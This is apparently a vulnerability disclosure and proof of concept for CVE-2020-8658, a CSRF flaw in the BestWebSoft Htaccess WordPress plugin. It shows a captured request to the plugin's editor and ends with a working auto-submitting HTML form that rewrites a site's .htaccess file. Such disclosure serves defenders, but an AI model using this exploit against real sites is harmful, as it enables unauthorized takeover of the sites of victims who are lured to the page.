This PoC will be describe how to exploit CSRF vulnerability found in WordPress plugin Htaccess by BestWebSoft
- I published this CVE-2020-8658
Cross-site request forgery, also known as one-click attack or session riding and abbreviated as CSRF or XSRF, is a type of malicious exploit of a website where unauthorized commands are transmitted from a user that the web application trusts.
Description
Htaccess plugin is a simple and useful tool which helps to control the access to your WordPress website. Allow or deny access based on a hostname, IP address, IP range, and others. Disable hotlinking and access to xmlrpc.php.
Plugin page on WordPress directory
htaccess is short for Hypertext Access, and is a configuration file used by Apache-based web servers that controls the directory that it “lives” in — as well as all the subdirectories underneath that directory. Many times, if you have installed a Content Management System (CMS), such as Drupal, Joomla or Wordpress, you likely encountered the .htaccess file. You may not have even had to edit it, but it was among the files that you uploaded to your web server.
Some of the features of the .htaccess file include the ability to password protect folders, ban users or allow users using IP addresses, stop directory listings, redirect users to another page or directory automatically, create and use custom error pages, change the way files with certain extensions are utilized, or even use a different file as the index file by specifying the file extension or specific file.
Using burp to capture the HTTP request on the .htaccess file edit page we have:
POST /poc2/wp-admin/admin.php?page=htaccess.php&action=htaccess_editor HTTP/1.1
Host: sejalivre.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: pt-BR,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: https://sejalivre.org/poc2/wp-admin/admin.php?page=htaccess.php&action=htaccess_editor
Content-Type: application/x-www-form-urlencoded
Content-Length: 817
Origin: https://sejalivre.org
DNT: 1
Connection: close
Cookie: ************
htccss_customise=%23+BEGIN+WordPress%0D%0A%23+The+directives+%28lines%29+between+%60BEGIN+WordPress%60+and+%60END+WordPress%60+are%0D%0A%23+dynamically+generated%2C+and+should+only+be+modified+via+WordPress+filters.%0D%0A%23+Any+changes+to+the+directives+between+these+markers+will+be+overwritten.%0D%0A%3CIfModule+mod_rewrite.c%3E%0D%0ARewriteEngine+On%0D%0ARewriteBase+%2Fpoc2%2F%0D%0ARewriteRule+%5Eindex%5C.php%24+-+%5BL%5D%0D%0ARewriteCond+%25%7BREQUEST_FILENAME%7D+%21-f%0D%0ARewriteCond+%25%7BREQUEST_FILENAME%7D+%21-d%0D%0ARewriteRule+.+%2Fpoc2%2Findex.php+%5BL%5D%0D%0A%3C%2FIfModule%3E%0D%0A%0D%0A%23+END+WordPress&htccss_form_custom=submit&htccss_submit_button_custom=Save+Changes&htccss_nonce_name=a55b75cec9&_wp_http_referer=%2Fpoc2%2Fwp-admin%2Fadmin.php%3Fpage%3Dhtaccess.php%26action%3Dhtaccess_editor
The flag htccss_nonce_name= passes the nonce to WordPress (a nonce is a "number used once" to help protect URLs and forms from certain types of misuse, malicious or otherwise. WordPress nonces are one-time use security tokens generated by WordPress to help protect URLs and forms from misuse.) but the plugin does not validate correctly, resulting in a wrong implementation of anti-CSRF protection.
In this way an attacker is able to direct the victim to a malicious web page that contains the exploit code below, which will arbitrarily edit the contents of the .htaccess file and take control of the website.
<html>
<body>
<form action="https://sejalivre.org/poc2/wp-admin/admin.php?page=htaccess.php&action=htaccess_editor" method="POST">
<input type="hidden" name="htccss_customise" value="#+BEGIN+WordPress+Hacked+LoL#+The+directives+(lines)+between+`BEGIN+WordPress`+and+`END+WordPress`+are#+dynamically+generated,+and+should+only+be+modified+via+WordPress+filters.#+Any+changes+to+the+directives+between+these+markers+will+be+overwritten.<IfModule+mod_rewrite.c>RewriteEngine+OnRewriteBase+/poc2/RewriteRule+^index\.php$+-+[L]RewriteCond+%{REQUEST_FILENAME}+!-fRewriteCond+%{REQUEST_FILENAME}+!-dRewriteRule+.+/poc2/index.php+[L]</IfModule>#+END+WordPress" />
<input type="hidden" name="htccss_form_custom" value="submit" />
<input type="hidden" name="htccss_submit_button_custom" value="Save+Changes" />
<input type="hidden" name="htccss_nonce_name" value="attacker" />
<input type="hidden" name="_wp_http_referer" value="/poc2/wp-admin/admin.php?page=htaccess.php&action=htaccess_editor" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
